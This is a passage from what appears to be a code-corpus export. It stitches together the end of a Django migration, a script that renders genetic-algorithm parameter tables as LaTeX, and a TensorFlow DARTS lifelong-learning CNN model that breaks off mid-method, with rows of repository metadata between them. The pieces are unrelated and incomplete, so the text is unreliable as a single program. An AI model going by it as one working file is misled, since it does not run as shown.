),
),
(
"sku",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="Supplier_Product_product_fk",
to="operations.product",
),
),
(
"supplier",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="supplier_product_supplier_fk",
to="purchasing.supplier",
),
),
],
options={
"verbose_name": "Supplier Product",
"verbose_name_plural": "Supplier Products",
"ordering": ("sku", "supplier_sku"),
"unique_together": {("supplier", "supplier_sku")},
},
),
migrations.CreateModel(
name="Invoice_Line",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
auto_now_add=True, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
auto_now=True, verbose_name="Datetime Updated"
),
),
(
"unit_of_measure",
models.CharField(
choices=[
("grams", "grams"),
("oz", "oz"),
("lbs", "lbs"),
("each", "each"),
("minutes", "minutes"),
],
max_length=200,
),
),
("quantity", models.DecimalField(decimal_places=2, max_digits=12)),
("total_cost", models.DecimalField(decimal_places=2, max_digits=12)),
(
"_created_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="invoice_line_created_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="invoice_line_last_updated_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"invoice",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="Invoice_Line_invoice_fk",
to="purchasing.invoice",
),
),
(
"manufacturer",
models.ForeignKey(
blank=True,
help_text="Only needs to be populated if the manufacturer is different than the invoicing supplier.",
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="Invoice_Manufacturer_fk",
to="purchasing.supplier",
verbose_name="Manufacturer",
),
),
(
"sku",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="Invoice_Line_sku_fk",
to="operations.product",
verbose_name="MoonDance SKU",
),
),
],
options={
"verbose_name": "Recipt Line",
"verbose_name_plural": "Recipt Lines",
"ordering": ("sku",),
"unique_together": {("sku", "invoice")},
},
),
migrations.CreateModel(
name="Inventory_Onhand",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
auto_now_add=True, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
auto_now=True, verbose_name="Datetime Updated"
),
),
(
"location",
models.CharField(
choices=[
("Bondo - Garage", "Bondo - Garage"),
("Bondo - 2nd Floor", "Bondo - 2nd Floor"),
("MoonDance - Workshop", "MoonDance - Workshop"),
(
"MoonDance - Fulfillment Center",
"MoonDance - Fulfillment Center",
),
],
max_length=200,
verbose_name="Current Location",
),
),
(
"quantity_onhand",
models.DecimalField(decimal_places=2, max_digits=12),
),
(
"to_location",
models.CharField(
blank=True,
choices=[
("Bondo - Garage", "Bondo - Garage"),
("Bondo - 2nd Floor", "Bondo - 2nd Floor"),
("MoonDance - Workshop", "MoonDance - Workshop"),
(
"MoonDance - Fulfillment Center",
"MoonDance - Fulfillment Center",
),
],
max_length=200,
null=True,
verbose_name="Transfer To Location",
),
),
(
"transfer_quantity",
models.DecimalField(
blank=True, decimal_places=2, max_digits=12, null=True
),
),
(
"_created_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="inventory_onhand_created_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="inventory_onhand_last_updated_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"sku",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="Inventory_Onhand_sku_fk",
to="operations.product",
),
),
],
options={
"verbose_name": "Inventory Onhand",
"verbose_name_plural": "Inventory Onhand",
"ordering": ("sku", "location"),
"unique_together": {("sku", "location")},
},
),
migrations.AlterField(
model_name="historicalinvoice_line",
name="unit_of_measure",
field=models.CharField(
choices=[
("grams", "grams"),
("oz", "oz"),
("lbs", "lbs"),
("each", "each"),
("hourly", "hourly"),
],
max_length=200,
),
),
migrations.AlterField(
model_name="invoice_line",
name="unit_of_measure",
field=models.CharField(
choices=[
("grams", "grams"),
("oz", "oz"),
("lbs", "lbs"),
("each", "each"),
("hourly", "hourly"),
],
max_length=200,
),
),
]
| 38.950276 | 125 | 0.373262 | 2,698 | 42,300 | 5.618977 | 0.067457 | 0.061675 | 0.036939 | 0.058047 | 0.920844 | 0.912137 | 0.903298 | 0.902177 | 0.892546 | 0.888918 | 0 | 0.009277 | 0.533641 | 42,300 | 1,085 | 126 | 38.986175 | 0.759213 | 0.001064 | 0 | 0.821892 | 1 | 0 | 0.131139 | 0.01394 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.004638 | 0 | 0.008349 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
037138359f6073b74c19121804c6dae8c0147c18 | 9,768 | py | Python | tables.py | leguiart/Evolutionary_Computing | 67dc2d8e284ea4b9d21af10793778b942708114b | [
"MIT"
] | 1 | 2021-07-06T12:54:20.000Z | 2021-07-06T12:54:20.000Z | tables.py | leguiart/Evolutionary_Computing | 67dc2d8e284ea4b9d21af10793778b942708114b | [
"MIT"
] | null | null | null | tables.py | leguiart/Evolutionary_Computing | 67dc2d8e284ea4b9d21af10793778b942708114b | [
"MIT"
] | null | null | null | from tabulate import tabulate
from hklearn_genetic.problem import BinaryRastrigin, BinaryBeale, BinaryHimmelblau, BinaryEggholder
from texttable import Texttable
import latextable
rast = BinaryRastrigin(n_dim = 2, n_prec=8)
beale = BinaryBeale(n_prec=8)
himme = BinaryHimmelblau(n_prec=8)
egg = BinaryEggholder(n_prec=4)
params_bin = {'PS_BINARY': {'Rastrigin': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'proportional'}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'proportional'}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.0125, 'max_iter': 1000, 'selection': 'proportional'}, 'Eggholder': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.020833333333333332, 'max_iter': 1000, 'selection': 'proportional'}}, 'PS_E_BINARY': {'Rastrigin': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.1}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.3}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.3}, 'Eggholder': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.020833333333333332, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.1}}, 'TS_BINARY': {'Rastrigin': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.004166666666666667, 'max_iter': 1000, 'selection': 'tournament'}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'tournament'}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.0125, 'max_iter': 1000, 'selection': 'tournament'}, 'Eggholder': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.015625, 'max_iter': 1000, 'selection': 'tournament'}}, 'TS_E_BINARY': {'Rastrigin': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.0125, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.2}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.0125, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.1}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.1}, 'Eggholder': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.015625, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.3}}, 'SUS_BINARY': {'Rastrigin': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'sus'}, 'Beale': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'sus'}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.004166666666666667, 'max_iter': 1000, 'selection': 'sus'}, 'Eggholder': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.020833333333333332, 'max_iter': 1000, 'selection': 'sus'}}, 'SUS_E_BINARY': {'Rastrigin': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.004166666666666667, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.1}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.016666666666666666, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.1}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.004166666666666667, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.3}, 'Eggholder': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.005208333333333333, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.1}}}
params_real = {'PS_REAL': {'Rastrigin': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.2, 'max_iter': 1000, 'selection': 'proportional'}, 'Beale': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.2, 'max_iter': 1000, 'selection': 'proportional'}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.2, 'max_iter': 1000, 'selection': 'proportional'}, 'Eggholder': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.25, 'max_iter': 1000, 'selection': 'proportional'}}, 'PS_E_REAL': {'Rastrigin': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.5, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.2}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.2, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.2}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.2, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.2}, 'Eggholder': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.2, 'max_iter': 1000, 'selection': 'proportional', 'elitism': 0.1}}, 'TS_REAL': {'Rastrigin': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.2, 'max_iter': 1000, 'selection': 'tournament'}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.2, 'max_iter': 1000, 'selection': 'tournament'}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.25, 'max_iter': 1000, 'selection': 'tournament'}, 'Eggholder': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.5, 'max_iter': 1000, 'selection': 'tournament'}}, 'TS_E_REAL': {'Rastrigin': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.5, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.2}, 'Beale': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.5, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.1}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.5, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.2}, 'Eggholder': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.5, 'max_iter': 1000, 'selection': 'tournament', 'elitism': 0.1}}, 'SUS_REAL': {'Rastrigin': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.25, 'max_iter': 1000, 'selection': 'sus'}, 'Beale': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.5, 'max_iter': 1000, 'selection': 'sus'}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.25, 'max_iter': 1000, 'selection': 'sus'}, 'Eggholder': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.2, 'max_iter': 1000, 'selection': 'sus'}}, 'SUS_E_REAL': {'Rastrigin': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.5, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.2}, 'Beale': {'n_individuals': 500, 'pc': 0.95, 'pm': 0.2, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.1}, 'Himmelblau': {'n_individuals': 500, 'pc': 0.9, 'pm': 0.25, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.1}, 'Eggholder': {'n_individuals': 500, 'pc': 0.85, 'pm': 0.25, 'max_iter': 1000, 'selection': 'sus', 'elitism': 0.3}}}
# table = Texttable()
# table.set_deco(Texttable.HEADER)
# table.set_cols_dtype(['t', # text
# 'i',
# 'f',
# 'i',
# 't'])
# # 'f', # float (decimal)
# # 'e', # float (exponent)
# # 'i', # integer
# # 'a']) # automatic
# table.set_cols_align(["l", "r", "r", "r", "l"])
for k, v in params_bin.items():
cols = ["Function"] + list(params_bin[k]["Rastrigin"].keys())
for i in range(len(cols)):
cols[i] = cols[i].replace("_", " ")
table = Texttable()
table.set_deco(Texttable.HEADER)
if len(cols) == 6:
table.set_cols_dtype(['t', # text
'i',
'f',
'f',
'i',
't'])
table.set_cols_align(["l", "r", "r", "r", "r", "l"])
elif len(cols) == 7:
table.set_cols_dtype(['t', # text
'i',
'f',
'f',
'i',
'f',
't'])
table.set_cols_align(["l", "r", "r", "r", "r", "r", "l"])
rows = [cols]
#table.add_rows(cols)
for_caption = k.replace("_", " ")
for k1, v1 in v.items():
first_column = k1
row = [first_column]
for v2 in v1.values():
row += [v2]
rows += [row]
table.add_rows(rows)
#print(table.draw() + "\n")
print(latextable.draw_latex(table, caption=f"{for_caption} parameters.", label=for_caption) + "\n")
for k, v in params_real.items():
cols = ["Function"] + list(params_real[k]["Rastrigin"].keys())
for i in range(len(cols)):
cols[i] = cols[i].replace("_", " ")
table = Texttable()
table.set_deco(Texttable.HEADER)
if len(cols) == 6:
table.set_cols_dtype(['t', # text
'i',
'f',
'f',
'i',
't'])
table.set_cols_align(["l", "r", "r", "r", "r", "l"])
elif len(cols) == 7:
table.set_cols_dtype(['t', # text
'i',
'f',
'f',
'i',
'f',
't'])
table.set_cols_align(["l", "r", "r", "r", "r", "r", "l"])
rows = [cols]
for_caption = k.replace("_", " ")
#table.add_rows(cols)
for_caption = k
for k1, v1 in v.items():
first_column = k1
row = [first_column]
for v2 in v1.values():
row += [v2]
rows += [row]
table.add_rows(rows)
#print(table.draw() + "\n")
print(latextable.draw_latex(table, caption=f"{for_caption} parameters.", label=for_caption) + "\n")
# table.add_rows([cols,
# ["abcd", "67", 654, 89, 128.001],
# ["efghijk", 67.5434, .654, 89.6, 12800000000000000000000.00023],
# ["lmn", 5e-78, 5e-78, 89.4, .000000000000128],
# ["opqrstu", .023, 5e+78, 92., 12800000000000000000000]])
# print(table.draw() + "\n")
# print(latextable.draw_latex(table, caption="Another table.", label="table:another_table") + "\n")
# print(latextable.draw_latex(table, caption="A table with dropped columns.", label="table:dropped_column_table", drop_columns=['exp', 'int']))
# rows = list(params_bin["PS_BINARY"].keys())
# table_bin = tabulate(params_bin["PS_BINARY"])
# table_real = tabulate(params_real["PS_REAL"])
# print(table_bin)
# print(table_real) | 82.084034 | 3,086 | 0.569308 | 1,279 | 9,768 | 4.20172 | 0.102424 | 0.107183 | 0.133978 | 0.151842 | 0.861556 | 0.846669 | 0.842017 | 0.807964 | 0.77112 | 0.744325 | 0 | 0.136729 | 0.198096 | 9,768 | 119 | 3,087 | 82.084034 | 0.549343 | 0.131245 | 0 | 0.805195 | 0 | 0 | 0.338228 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.051948 | 0 | 0.051948 | 0.025974 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
037413479ba910a5d397529d856cb37b484a5f0e | 45,838 | py | Python | classification/model/cnn_darts_model.py | Lifelong-ML/LASEM | c4ec052c850e37f54bc3e6faf6b988a4c5239f10 | [
"MIT"
] | 8 | 2021-07-06T14:35:50.000Z | 2022-03-03T08:45:13.000Z | classification/model/cnn_darts_model.py | Lifelong-ML/LASEM | c4ec052c850e37f54bc3e6faf6b988a4c5239f10 | [
"MIT"
] | null | null | null | classification/model/cnn_darts_model.py | Lifelong-ML/LASEM | c4ec052c850e37f54bc3e6faf6b988a4c5239f10 | [
"MIT"
] | 1 | 2021-07-09T09:26:11.000Z | 2021-07-09T09:26:11.000Z | import tensorflow as tf
import numpy as np
from random import shuffle
from utils.utils import get_value_of_valid_tensors, savemat_wrapper, savemat_wrapper_nested_list, count_trainable_var2
from utils.utils import new_weight, new_bias, new_ELLA_KB_param, get_list_of_valid_tensors, data_x_add_dummy, data_x_and_y_add_dummy
from utils.utils_nn import new_flexible_hardparam_cnn_fc_nets, new_darts_cnn_fc_net
from utils.utils_df_nn import new_ELLA_flexible_cnn_deconv_tensordot_fc_net, new_darts_dfcnn_fc_net
from classification.model.lifelong_model_frame import Lifelong_Model_Frame
_tf_ver = tf.__version__.split('.')
_up_to_date_tf = int(_tf_ver[0]) > 1 or (int(_tf_ver[0])==1 and int(_tf_ver[1]) >= 14)
if _up_to_date_tf:
_tf_tensor = tf.is_tensor
else:
_tf_tensor = tf.contrib.framework.is_tensor
########################################################
#### DARTS (Differentiable Architecture Search) ####
#### based Selective Sharing baseline model ####
########################################################
class LL_HPS_CNN_DARTS_net(Lifelong_Model_Frame):
def __init__(self, model_hyperpara, train_hyperpara):
super().__init__(model_hyperpara, train_hyperpara)
self.approx_order=model_hyperpara['darts_approx_order']
self.conv_sharing = []
def _possible_choices(input_subsets):
list_subsets = []
for c in [False, True]:
for elem in input_subsets:
list_subsets.append(elem+[c])
return list_subsets
self._possible_configs = [[]]
for layer_cnt in range(self.num_conv_layers):
self._possible_configs = _possible_choices(self._possible_configs)
self.num_possible_configs = len(self._possible_configs)
def _build_task_model(self, net_input, output_size, task_cnt, params=None, trainable=False):
if params is None:
params_shared_conv, params_TS_conv, params_fc = None, None, None
else:
params_shared_conv, params_TS_conv, params_fc = params['Shared_Conv'], params['TS_Conv'], params['FC']
if params_TS_conv is not None:
assert (len(params_TS_conv) == 2*self.num_conv_layers), "Given trained parameters of conv doesn't match to the hyper-parameters!"
if params_fc is not None:
assert (len(params_fc) == 2*self.num_fc_layers), "Given trained parameters of fc doesn't match to the hyper-parameters!"
eval_net = []
if (task_cnt==self.current_task) and self.task_is_new:
## DARTS-based Hybrid HPS
with tf.name_scope('DARTS_HPS'):
task_net, _, conv_TS_params, conv_select_params, fc_params = new_darts_cnn_fc_net(net_input, self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[output_size], cnn_activation_fn=self.hidden_act, cnn_shared_params=params_shared_conv, cnn_TS_params=params_TS_conv, select_params=None, fc_activation_fn=self.hidden_act, fc_params=params_fc, padding_type=self.padding_type, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, input_size=self.input_size[0:2], trainable=trainable)
self.conv_select_params = conv_select_params
## build network for evaluation
for conf in self._possible_configs:
net_tmp, _, _, _ = new_flexible_hardparam_cnn_fc_nets(net_input, self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[output_size], conf, cnn_activation_fn=self.hidden_act, shared_cnn_params=params_shared_conv, cnn_params=conv_TS_params, fc_activation_fn=self.hidden_act, fc_params=fc_params, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, padding_type=self.padding_type, input_size=self.input_size[0:2], trainable=trainable, trainable_shared=trainable)
eval_net.append(net_tmp[-1])
else:
## Hybrid HPS with the learned configuration
task_net, conv_TS_params, _, fc_params = new_flexible_hardparam_cnn_fc_nets(net_input, self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[output_size], self.conv_sharing[task_cnt], cnn_activation_fn=self.hidden_act, shared_cnn_params=params_shared_conv, cnn_params=params_TS_conv, fc_activation_fn=self.hidden_act, fc_params=params_fc, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, padding_type=self.padding_type, input_size=self.input_size[0:2], trainable=trainable, trainable_shared=trainable)
return task_net, eval_net, conv_TS_params, fc_params
def _build_whole_model(self):
for task_cnt, (num_classes, x_b) in enumerate(zip(self.output_sizes, self.x_batch)):
if (task_cnt==self.current_task) and (self.task_is_new):
param_to_reuse = {'Shared_Conv': self.shared_conv_params, 'TS_Conv': None, 'FC': None}
else:
param_to_reuse = {'Shared_Conv': self.shared_conv_params, 'TS_Conv': self.np_params[task_cnt]['TS_Conv'], 'FC': self.np_params[task_cnt]['FC']}
task_net, eval_net, conv_TS_params, fc_params = self._build_task_model(x_b, num_classes, task_cnt, params=param_to_reuse, trainable=(task_cnt==self.current_task))
self.task_models.append(task_net)
self.conv_params.append(conv_TS_params)
self.fc_params.append(fc_params)
self.params.append(self._collect_trainable_variables())
self.num_trainable_var += count_trainable_var2(self.params[-1]) if task_cnt < 1 else count_trainable_var2(self.params[-1]) - self.shared_conv_params_size
if len(eval_net) > 0:
self.darts_eval_models = eval_net
#self.conv_trainable_param = get_list_of_valid_tensors(self.conv_params[self.current_task])
#self.fc_trainable_param = get_list_of_valid_tensors(self.fc_params[self.current_task])
#self.trainable_params = list(self.dfcnn_KB_trainable_param) + list(self.dfcnn_TS_trainable_param) + list(self.conv_trainable_param) + list(self.fc_trainable_param)
def add_new_task(self, output_dim, curr_task_index, single_input_placeholder=False):
self.conv_select_params, self.darts_eval_models = None, None
self._shared_param_init()
super().add_new_task(output_dim, curr_task_index, single_input_placeholder=single_input_placeholder)
def _shared_param_init(self):
shared_conv_init_val = self.np_params[0]['Shared_Conv'] if hasattr(self, 'np_params') else [None for _ in range(2*self.num_conv_layers)]
self.shared_conv_params = []
for layer_cnt in range(self.num_conv_layers):
self.shared_conv_params.append(new_weight(shape=self.cnn_kernel_size[2*layer_cnt:2*(layer_cnt+1)]+self.cnn_channels_size[layer_cnt:layer_cnt+2], init_tensor=shared_conv_init_val[2*layer_cnt], trainable=True, name='Shared_Conv_W%d'%(layer_cnt)))
self.shared_conv_params.append(new_bias(shape=[self.cnn_channels_size[layer_cnt+1]], init_tensor=shared_conv_init_val[2*layer_cnt+1], trainable=True, name='Shared_Conv_b%d'%(layer_cnt)))
self.shared_conv_params_size = count_trainable_var2(self.shared_conv_params)
def get_darts_selection_val(self, sess):
return get_value_of_valid_tensors(sess, self.conv_select_params)
def get_params_val(self, sess, use_npparams=True):
selection_params_val = self.get_darts_selection_val(sess)
if use_npparams:
shared_conv_val = self.np_params[0]['Shared_Conv']
TS_conv_val = [np_p['TS_Conv'] for np_p in self.np_params]
fc_val = [np_p['FC'] for np_p in self.np_params]
else:
shared_conv_val = get_value_of_valid_tensors(sess, self.shared_conv_params)
TS_conv_val = [get_value_of_valid_tensors(sess, cnn_TS_param) for cnn_TS_param in self.conv_params]
fc_val = [get_value_of_valid_tensors(sess, fc_param) for fc_param in self.fc_params]
parameters_val = {}
parameters_val['DARTS_selection_param'] = savemat_wrapper(selection_params_val)
parameters_val['shared_conv'] = savemat_wrapper(shared_conv_val)
parameters_val['TS_conv'] = savemat_wrapper_nested_list(TS_conv_val)
parameters_val['fc_weights'] = savemat_wrapper_nested_list(fc_val)
return parameters_val
def best_config(self, sess):
## return the index of appropriate sharing configuration (self._possible_configs) according to the value of DARTS selection parameters
selection_val = self.get_darts_selection_val(sess)
# argmax 0 -> task-specific / argmax 1 -> shared
selected_config_index = 0
for layer_cnt, (layer_select) in enumerate(selection_val):
selected_config_index = selected_config_index + np.argmax(layer_select) * (2**layer_cnt)
return selected_config_index
def darts_learned_selection(self, sess):
## return the list of decision (T:shared/F:task-specific) of sharing in each layer according to the value of DARTS selection parameters
## for elements of self.conv_sharing (e.g. 'bottom2' : [TTFFF..])
selection_val = self.get_darts_selection_val(sess)
sharing_flags = []
for layer_select in selection_val:
sharing_flags.append(np.argmax(layer_select))
return sharing_flags
def define_eval(self):
with tf.name_scope('Model_Eval'):
mask = tf.reshape(tf.cast(tf.range(self.batch_size)<self.num_data_in_batch, dtype=tf.float32), [self.batch_size, 1])
self.eval = [tf.nn.softmax(task_model[-1])*mask for task_model in self.task_models]
self.pred = [tf.argmax(task_model[-1]*mask, 1) for task_model in self.task_models]
if self.task_is_new:
self.eval_for_new_task = [tf.nn.softmax(task_model)*mask for task_model in self.darts_eval_models]
self.pred_for_new_task = [tf.argmax(task_model*mask, 1) for task_model in self.darts_eval_models]
def _loss_func(self, y1, y2):
return tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=tf.cast(y1, tf.int32), logits=y2))
def define_loss(self):
with tf.name_scope('Model_Loss'):
self.loss = [self._loss_func(y_batch, task_model[-1]) for y_batch, task_model in zip(self.y_batch, self.task_models)]
def define_accuracy(self):
with tf.name_scope('Model_Accuracy'):
mask = tf.cast(tf.range(self.batch_size)<self.num_data_in_batch, dtype=tf.float32)
self.accuracy = [tf.reduce_sum(tf.cast(tf.equal(tf.argmax(task_model[-1], 1), tf.cast(y_batch, tf.int64)), tf.float32)*mask) for y_batch, task_model in zip(self.y_batch, self.task_models)]
if self.task_is_new:
self.accuracy_for_new_task = [tf.reduce_sum(tf.cast(tf.equal(tf.argmax(task_model, 1), tf.cast(self.y_batch[self.current_task], tf.int64)), tf.float32)*mask) for task_model in self.darts_eval_models]
def define_opt(self):
with tf.name_scope('Optimization'):
self.grads = tf.gradients(self.loss[self.current_task], self.params[self.current_task])
trainer = tf.train.RMSPropOptimizer(learning_rate=self.learn_rate/(1.0+self.epoch*self.learn_rate_decay))
self.update = trainer.apply_gradients(list(zip(self.grads, self.params[self.current_task])))
if self.task_is_new:
if self.approx_order == 1:
self.selection_grads = tf.gradients(self.loss[self.current_task], self.conv_select_params)
elif self.approx_order == 2:
#new_approx_params = [p-g*(self.learn_rate/(1.0+self.epoch*self.learn_rate_decay)) for (p, g) in zip(self.params[self.current_task], self.grads)]
new_approx_params = [p-g*self.learn_rate for (p, g) in zip(self.params[self.current_task], self.grads)]
new_shared_conv = new_approx_params[0:2*self.num_conv_layers]
new_TS_conv = new_approx_params[2*self.num_conv_layers:4*self.num_conv_layers]
new_fc = new_approx_params[4*self.num_conv_layers:]
unrolled_model, _, _, _, _ = new_darts_cnn_fc_net(self.x_batch[self.current_task], self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[self.output_sizes[self.current_task]], cnn_activation_fn=self.hidden_act, cnn_shared_params=new_shared_conv, cnn_TS_params=new_TS_conv, select_params=self.conv_select_params, fc_activation_fn=self.hidden_act, fc_params=new_fc, padding_type=self.padding_type, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, input_size=self.input_size[0:2])
unrolled_loss = self._loss_func(self.y_batch[self.current_task], unrolled_model[-1])
#self.selection_grads = tf.gradients(unrolled_loss, self.conv_select_params)
selection_grads = tf.gradients(unrolled_loss, self.conv_select_params)
dw = tf.gradients(unrolled_loss, new_approx_params)
## compute partial gradient approximating hessian
ratios = [0.01/tf.norm(g) for g in dw]
approx_params_upper = [p+g*r for (p, g, r) in zip(new_approx_params, dw, ratios)]
upper_model, _, _, _, _ = new_darts_cnn_fc_net(self.x_batch[self.current_task], self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[self.output_sizes[self.current_task]], cnn_activation_fn=self.hidden_act, cnn_shared_params=approx_params_upper[0:2*self.num_conv_layers], cnn_TS_params=approx_params_upper[2*self.num_conv_layers:4*self.num_conv_layers], select_params=self.conv_select_params, fc_activation_fn=self.hidden_act, fc_params=approx_params_upper[4*self.num_conv_layers:], padding_type=self.padding_type, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, input_size=self.input_size[0:2])
upper_loss = self._loss_func(self.y_batch[self.current_task], upper_model[-1])
upper_grad = tf.gradients(upper_loss, self.conv_select_params)
approx_params_lower = [p-g*r for (p, g, r) in zip(new_approx_params, dw, ratios)]
